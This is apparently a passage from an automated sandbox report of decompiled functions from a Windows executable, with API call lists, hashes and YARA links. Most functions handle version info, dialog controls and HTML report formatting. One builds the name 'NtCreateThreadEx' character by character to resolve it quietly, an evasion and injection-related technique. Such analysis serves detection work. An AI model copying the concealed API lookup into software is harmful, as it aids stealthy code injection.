                                                                                                                • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                • wcscpy.MSVCRT ref: 0040B128
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 1223191525-1542517562
                                                                                                                • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                0x0040a1f8
                                                                                                                0x0040a26d
                                                                                                                0x00000000
                                                                                                                0x0040a26f
                                                                                                                0x0040a205
                                                                                                                0x0040a20b
                                                                                                                0x0040a20d
                                                                                                                0x0040a213
                                                                                                                0x0040a214
                                                                                                                0x0040a215
                                                                                                                0x0040a216
                                                                                                                0x0040a217
                                                                                                                0x0040a219
                                                                                                                0x0040a21f
                                                                                                                0x0040a223
                                                                                                                0x0040a227
                                                                                                                0x0040a22b
                                                                                                                0x0040a22f
                                                                                                                0x0040a233
                                                                                                                0x0040a237
                                                                                                                0x0040a23b
                                                                                                                0x0040a23f
                                                                                                                0x0040a243
                                                                                                                0x0040a247
                                                                                                                0x0040a24b
                                                                                                                0x0040a24f
                                                                                                                0x0040a253
                                                                                                                0x0040a257
                                                                                                                0x0040a25b
                                                                                                                0x0040a25f
                                                                                                                0x0040a269
                                                                                                                0x00000000
                                                                                                                0x0040a26c
                                                                                                                0x0040a271

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                • API String ID: 2574300362-1257427173
                                                                                                                • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                0x00407f9b
                                                                                                                0x00407fa3
                                                                                                                0x00407fad
                                                                                                                0x00407fb9
                                                                                                                0x0040802e
                                                                                                                0x00408032
                                                                                                                0x00408038
                                                                                                                0x0040803e
                                                                                                                0x00407fbb
                                                                                                                0x00407fc9
                                                                                                                0x00407fd0
                                                                                                                0x00407fe0
                                                                                                                0x00407fe5
                                                                                                                0x00407ff7
                                                                                                                0x00408015
                                                                                                                0x0040801b
                                                                                                                0x00408021
                                                                                                                0x00408021
                                                                                                                0x00408051
                                                                                                                0x00408051
                                                                                                                0x00408059
                                                                                                                0x00408065
                                                                                                                0x00408069
                                                                                                                0x0040806f
                                                                                                                0x00408087
                                                                                                                0x00408087
                                                                                                                0x0040809c
                                                                                                                0x004080bb
                                                                                                                0x004080d1
                                                                                                                0x004080de
                                                                                                                0x004080e2
                                                                                                                0x004080ea
                                                                                                                0x004080fb
                                                                                                                0x00408105
                                                                                                                0x00408115
                                                                                                                0x00408121
                                                                                                                0x00408127
                                                                                                                0x00408150

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407FD0
                                                                                                                • memset.MSVCRT ref: 00407FE5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                • LoadImageW.USER32 ref: 004080B4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                • LoadImageW.USER32 ref: 004080D1
                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 304928396-0
                                                                                                                • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                0x0040ae90
                                                                                                                0x0040aeab
                                                                                                                0x0040aeb2
                                                                                                                0x0040aec0
                                                                                                                0x0040aec7
                                                                                                                0x0040aecc
                                                                                                                0x0040aed3
                                                                                                                0x0040aeda
                                                                                                                0x0040aee1
                                                                                                                0x0040aee1
                                                                                                                0x0040aee7
                                                                                                                0x0040aeea
                                                                                                                0x0040aeed
                                                                                                                0x0040aef9
                                                                                                                0x0040aefe
                                                                                                                0x0040af05
                                                                                                                0x0040af07
                                                                                                                0x0040af08
                                                                                                                0x0040af13
                                                                                                                0x0040af18
                                                                                                                0x0040af19
                                                                                                                0x0040af26
                                                                                                                0x0040af2b
                                                                                                                0x0040af2b
                                                                                                                0x0040af2e
                                                                                                                0x0040af34
                                                                                                                0x0040af43
                                                                                                                0x0040af44
                                                                                                                0x0040af4f
                                                                                                                0x0040af54
                                                                                                                0x0040af55
                                                                                                                0x0040af62
                                                                                                                0x0040af67
                                                                                                                0x0040af70
                                                                                                                0x0040af76
                                                                                                                0x0040af7a
                                                                                                                0x0040af82
                                                                                                                0x0040af88
                                                                                                                0x0040af8d
                                                                                                                0x0040af97
                                                                                                                0x0040af9f
                                                                                                                0x0040afa5
                                                                                                                0x0040afa9
                                                                                                                0x0040afb1
                                                                                                                0x0040afb7
                                                                                                                0x0040afbd

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                0x00403c09
                                                                                                                0x00403c0c
                                                                                                                0x00403c11
                                                                                                                0x00403c1b
                                                                                                                0x00403c3f
                                                                                                                0x00403c4a
                                                                                                                0x00403c6e
                                                                                                                0x00403c96
                                                                                                                0x00403c9a
                                                                                                                0x00403ca6
                                                                                                                0x00403cb3
                                                                                                                0x00403cb8
                                                                                                                0x00403cc5
                                                                                                                0x00403cca
                                                                                                                0x00403cdd
                                                                                                                0x00403ce6
                                                                                                                0x00403cf8
                                                                                                                0x00403d11
                                                                                                                0x00403d26
                                                                                                                0x00403d3f
                                                                                                                0x00403d54
                                                                                                                0x00403d6d
                                                                                                                0x00403d76
                                                                                                                0x00403d88
                                                                                                                0x00403d9e
                                                                                                                0x00403db0
                                                                                                                0x00403db5
                                                                                                                0x00403dc4
                                                                                                                0x00403dc8
                                                                                                                0x00403dc9
                                                                                                                0x00403dca
                                                                                                                0x00403dda
                                                                                                                0x00403ddf
                                                                                                                0x00403de2
                                                                                                                0x00403de3
                                                                                                                0x00403df4
                                                                                                                0x00403df8
                                                                                                                0x00403df9
                                                                                                                0x00403dfa
                                                                                                                0x00403e0a
                                                                                                                0x00403e0f
                                                                                                                0x00403e12
                                                                                                                0x00403e13
                                                                                                                0x00403e22
                                                                                                                0x00403e26
                                                                                                                0x00403e28
                                                                                                                0x00403e29
                                                                                                                0x00403e39
                                                                                                                0x00403e3e
                                                                                                                0x00403e41
                                                                                                                0x00403e42
                                                                                                                0x00403e51
                                                                                                                0x00403e55
                                                                                                                0x00403e57
                                                                                                                0x00403e58
                                                                                                                0x00403e68
                                                                                                                0x00403e6d
                                                                                                                0x00403e70
                                                                                                                0x00403e71
                                                                                                                0x00403e71
                                                                                                                0x00403e87
                                                                                                                0x00403e8d
                                                                                                                0x00403e9e
                                                                                                                0x00403ea6
                                                                                                                0x00403eaf
                                                                                                                0x00403ebc

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                  • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                • LoadImageW.USER32 ref: 00403C6A
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                • LoadImageW.USER32 ref: 00403C7F
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                  • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                  • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • GetDlgItem.USER32 ref: 00403D64
                                                                                                                • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                • GetDlgItem.USER32 ref: 00403E20
                                                                                                                • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038210931-0
                                                                                                                • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
